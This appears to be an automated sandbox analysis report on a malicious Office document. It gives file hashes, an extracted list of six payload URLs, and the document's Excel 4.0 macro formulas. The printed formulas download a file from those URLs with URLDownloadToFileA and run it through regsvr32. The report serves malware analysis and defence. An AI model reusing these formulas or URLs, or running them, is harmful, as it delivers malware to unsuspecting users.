General
-
Target
4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6
-
Size
29KB
-
MD5
7ae1c887379eda9abf51d00e6c37d5ae
-
SHA1
f66dcf5bb37d15c23dd4a787bc17e442764116ab
-
SHA256
4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6
-
SHA512
d4c8078282222dfc53fcab90a24a86811ed74ff77ead5f3b350fbfb50b61f0f07b1c7949b0d76bfb40805a4975818e67196dd9ae56329c137165d7be9ca85e05
-
SSDEEP
384:lDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:ZPELA2s61VECvgOZS4+NcDVOXD9F4IG
Malware Config
Extracted
http://janshabd.com/E33ZFv/
http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/
http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/
http://www.aacitygroup.com/mordacity/g29PQhuYA5x/
http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/
https://sse-studio.com/cq0xhpj/wdktmllfAYV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0) =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0)) =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0)) =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0)) =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0)) =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0)) =IF('OFJOV'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6